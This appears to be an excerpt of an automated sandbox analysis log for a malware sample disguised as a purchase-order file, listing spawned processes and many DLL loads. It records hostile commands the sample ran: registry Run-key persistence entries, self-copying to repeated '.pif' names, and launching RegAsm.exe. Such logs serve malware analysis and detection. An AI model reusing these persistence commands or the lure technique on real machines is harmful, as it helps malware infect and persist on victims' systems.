Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif"
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif.pif"
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c Copy "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif" "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif.pif"
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif.pif"
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif.pif"
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c Copy "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif" "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif.pif"
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "PURCHASED ORDER OF ENG091.pif.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif.pif"

Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.schema.shell.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	Section loaded: cmutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\cmmon32.exe	Section loaded: cmutil.dll
Source: C:\Windows\SysWOW64\cmmon32.exe	Section loaded: version.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Section loaded: mscoree.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Section loaded: version.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Section loaded: uxtheme.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Section loaded: windows.storage.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Section loaded: wldp.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Section loaded: profapi.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Section loaded: cryptsp.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Section loaded: rsaenh.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Section loaded: cryptbase.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Section loaded: rasapi32.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Section loaded: rasman.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Section loaded: rtutils.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Section loaded: mswsock.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Section loaded: winhttp.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Section loaded: iphlpapi.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Section loaded: dnsapi.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Section loaded: winnsi.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Section loaded: rasadhlp.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Section loaded: fwpuclnt.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Section loaded: amsi.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Section loaded: userenv.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Section loaded: msasn1.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Section loaded: gpapi.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Section loaded: wbemcomn.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Section loaded: mscoree.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Section loaded: apphelp.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Section loaded: version.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Section loaded: uxtheme.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Section loaded: windows.storage.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Section loaded: wldp.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Section loaded: profapi.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Section loaded: cryptsp.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Section loaded: rsaenh.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Section loaded: cryptbase.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Section loaded: rasapi32.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Section loaded: rasman.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Section loaded: rtutils.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Section loaded: mswsock.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Section loaded: winhttp.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Section loaded: iphlpapi.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Section loaded: dnsapi.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Section loaded: winnsi.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Section loaded: rasadhlp.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Section loaded: fwpuclnt.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Section loaded: amsi.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Section loaded: userenv.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Section loaded: msasn1.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Section loaded: gpapi.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Section loaded: mscoree.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Section loaded: version.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Section loaded: uxtheme.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Section loaded: windows.storage.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Section loaded: wldp.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Section loaded: profapi.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Section loaded: cryptsp.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Section loaded: rsaenh.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Section loaded: cryptbase.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Section loaded: rasapi32.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Section loaded: rasman.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Section loaded: rtutils.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Section loaded: mswsock.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Section loaded: winhttp.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Section loaded: iphlpapi.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Section loaded: dnsapi.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Section loaded: winnsi.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Section loaded: rasadhlp.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Section loaded: fwpuclnt.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Section loaded: amsi.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Section loaded: userenv.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Section loaded: msasn1.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Section loaded: gpapi.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Section loaded: wbemcomn.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Section loaded: mscoree.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Section loaded: apphelp.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Section loaded: version.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Section loaded: uxtheme.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Section loaded: windows.storage.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Section loaded: wldp.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Section loaded: profapi.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Section loaded: cryptsp.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Section loaded: rsaenh.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Section loaded: cryptbase.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Section loaded: rasapi32.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Section loaded: rasman.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Section loaded: rtutils.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Section loaded: mswsock.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Section loaded: winhttp.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Section loaded: iphlpapi.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Section loaded: dnsapi.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Section loaded: winnsi.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Section loaded: rasadhlp.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Section loaded: fwpuclnt.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Section loaded: amsi.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Section loaded: userenv.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Section loaded: msasn1.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Section loaded: gpapi.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Section loaded: mscoree.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Section loaded: version.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Section loaded: uxtheme.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Section loaded: windows.storage.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Section loaded: wldp.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Section loaded: profapi.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Section loaded: cryptsp.dll
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Section loaded: rsaenh.dll
